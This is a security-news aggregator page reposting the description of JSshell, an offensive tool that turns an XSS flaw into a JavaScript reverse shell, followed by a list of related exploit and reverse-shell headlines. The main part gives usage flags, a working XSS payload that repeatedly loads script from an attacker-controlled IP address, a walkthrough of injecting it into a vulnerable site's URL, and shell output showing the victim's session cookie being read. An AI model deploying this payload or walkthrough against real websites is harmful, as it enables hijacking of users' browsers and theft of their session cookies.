Cookie Consent by Free Privacy Policy Generator ๐Ÿ“Œ JSshell - A JavaScript Reverse Shell For Exploiting XSS Remotely Or Finding Blind XSS, Working With Both Unix And Windows OS

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š JSshell - A JavaScript Reverse Shell For Exploiting XSS Remotely Or Finding Blind XSS, Working With Both Unix And Windows OS


๐Ÿ’ก Newskategorie: IT Security Nachrichten
๐Ÿ”— Quelle: feedproxy.google.com


JSshell - a JavaScript reverse shell. This using for exploit XSS remotely, help to find blind XSS, ...
This tool works for both Unix and Windows operating system and it can running with both Python 2 and Python 3. This is a big update of JShell - a tool to get a JavaScript shell with XSS by s0med3v. JSshell also doesn't require Netcat (different from other javascript shells).

Usage

Generate JS reverse shell payload: -g

Set the local port number for listening and generating payload (By default, it will be set to 4848): -p

Set the local source address for generating payload (JSshell will detect your IP address by deault): -s

Set timeout for shell connection (if the user exit page, the shell will be pause, and if your set the timeout, after a while without response, the shell will automatically close): -w

Execute a command when got the shell: -c

Example usages:
  • js.py
  • js.py -g
  • js.py -p 1234
  • js.py -s 48.586.1.23 -g
  • js.py -c "alert(document.cookie)" -w 10

An example for running JSshell:
This is an example for step-by-step to exploit remote XSS using JSshell.
First we will generate a reverse JS shell payload and set the shell timeout is 20 seconds:
~# whoami
root
~# ls
README.md js.py
~# python3 js.py -g -w 20
__
|(_ _ |_ _ | |
\_|__)_> | |(/_ | |
v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...
Now paste this payload to the website (or URL) that vulnerable to XSS:
https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},1248)>
Access the page and now we will see that we have got the reverse JS shell:
    __
|(_ _ |_ _ | |
\_|__)_> | |(/_ | |
v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...
Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848
$ established
$ the
$ shell
$
$
$ help
JSshell using javascript code as shell commands. Also supports some commands:
help This help
exit, quit Exit the JS shell
$
Now let's execute some commands:
$ var test = 'hacked'
$ alert(hacked)
$
And the browser got an alert: hacked
$ prompt(document.cookie)
$
And the browser print the user cookies: JSESSION=3bda8...
$ exit
~# whoami
root
~# pwd
/home/shelld3v
~#
And we quited!

Author
This created by shelld3v, hacking at HackOne and Bugcrowd with a secret account! This tool is inspired by JShell (s0med3v), using the BruteLogic payload. JSshell 2.0 will has some new features that include:
  • More payloads for <img>, <script>, ...
  • Some shortcut commands: print the current session, domain, endpoint, ...
  • Better GUI
    ...


...



๐Ÿ“Œ JSshell - A JavaScript Reverse Shell For Exploiting XSS Remotely Or Finding Blind XSS, Working With Both Unix And Windows OS


๐Ÿ“ˆ 155.13 Punkte

๐Ÿ“Œ Unitech Unix posters (Unix Magic, Unix Feuds, Unix Views)


๐Ÿ“ˆ 45.04 Punkte

๐Ÿ“Œ JSShell - An Interactive Multi-User Web JS Shell


๐Ÿ“ˆ 43.29 Punkte

๐Ÿ“Œ An explanation of certified UNIX, Unix source code lineage, and Unix-like operating systems


๐Ÿ“ˆ 35.56 Punkte

๐Ÿ“Œ HTTP Asynchronous Reverse Shell - Asynchronous Reverse Shell Using The HTTP Protocol


๐Ÿ“ˆ 34.97 Punkte

๐Ÿ“Œ Reverse-Shell-Generator - Hosted Reverse Shell Generator With A Ton Of Functionality


๐Ÿ“ˆ 34.97 Punkte

๐Ÿ“Œ GitLab Survey Finds Positive Results For Both DevOps and Working Remotely


๐Ÿ“ˆ 34.42 Punkte

๐Ÿ“Œ How To Reverse a String In Unix / Linux Shell?


๐Ÿ“ˆ 28.74 Punkte

๐Ÿ“Œ Nim-Shell - Reverse Shell That Can Bypass Windows Defender Detection


๐Ÿ“ˆ 27.33 Punkte

๐Ÿ“Œ Sak1To-Shell - Multi-threaded C2 Server And Reverse Shell Client Written In Pure C


๐Ÿ“ˆ 27.24 Punkte

๐Ÿ“Œ What is bind shell and reverse shell


๐Ÿ“ˆ 27.24 Punkte

๐Ÿ“Œ Reverse Engineering a DLL Reverse Shell


๐Ÿ“ˆ 27 Punkte

๐Ÿ“Œ How to Reverse an Array in JavaScript โ€“ JS .reverse() Function


๐Ÿ“ˆ 26.48 Punkte

๐Ÿ“Œ "vmtouch is a tool for learning about and controlling the file system cache of unix and unix-like systems"


๐Ÿ“ˆ 26.09 Punkte

๐Ÿ“Œ Interesting discussion thread on ycombinator about both docker including devs from both


๐Ÿ“ˆ 25.97 Punkte

๐Ÿ“Œ Interesting discussion thread on ycombinator about both Docker & LXD including devs from both


๐Ÿ“ˆ 25.97 Punkte

๐Ÿ“Œ CS Professor Argues Silicon Valley Is Exploiting Both H-1B Visas And Workers


๐Ÿ“ˆ 25.86 Punkte

๐Ÿ“Œ Reliably Finding and Exploiting ICS/SCADA Bugs


๐Ÿ“ˆ 25.54 Punkte

๐Ÿ“Œ Reliably Finding and Exploiting ICS/SCADA Bugs - A walkthrough of a command inject exploit for Advantech WebAccess


๐Ÿ“ˆ 25.54 Punkte

๐Ÿ“Œ DEF CON Safe Mode - Jack Baker - Finding and Exploiting Bugs in Multiplayer Game Engines


๐Ÿ“ˆ 25.54 Punkte

๐Ÿ“Œ V3n0M-A Open Source Tool To Finding And Exploiting Vulnerability


๐Ÿ“ˆ 25.54 Punkte

๐Ÿ“Œ DEF CON Safe Mode -Jack Baker - Finding and Exploiting Bugs in Multiplayer Game Engines Q&A


๐Ÿ“ˆ 25.54 Punkte

๐Ÿ“Œ The Most Dangerous Codec in the World: Finding and Exploiting Vulnerabilities in H.264 Decoders


๐Ÿ“ˆ 25.54 Punkte

๐Ÿ“Œ V3n0M-A Open Source Tool To Finding And Exploiting Vulnerability


๐Ÿ“ˆ 25.54 Punkte

๐Ÿ“Œ #0daytoday #Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shell [#0day #Exploit]


๐Ÿ“ˆ 25.46 Punkte

๐Ÿ“Œ Telegram now lets you remotely delete private chats from both devices


๐Ÿ“ˆ 25.17 Punkte

๐Ÿ“Œ Pown-Duct - Essential Tool For Finding Blind Injection Attacks


๐Ÿ“ˆ 24.44 Punkte

๐Ÿ“Œ magicRecon - A Powerful Shell Script To Maximize The Recon And Data Collection Process Of An Objective And Finding Common Vulnerabilities


๐Ÿ“ˆ 24.22 Punkte

๐Ÿ“Œ Reverse engineering Animal Crossing's developer mode and finding a 16 year old cheat combo


๐Ÿ“ˆ 23.97 Punkte

๐Ÿ“Œ XSS-LOADER - XSS Payload Generator / XSS Scanner / XSS Dork Finder


๐Ÿ“ˆ 23.6 Punkte











matomo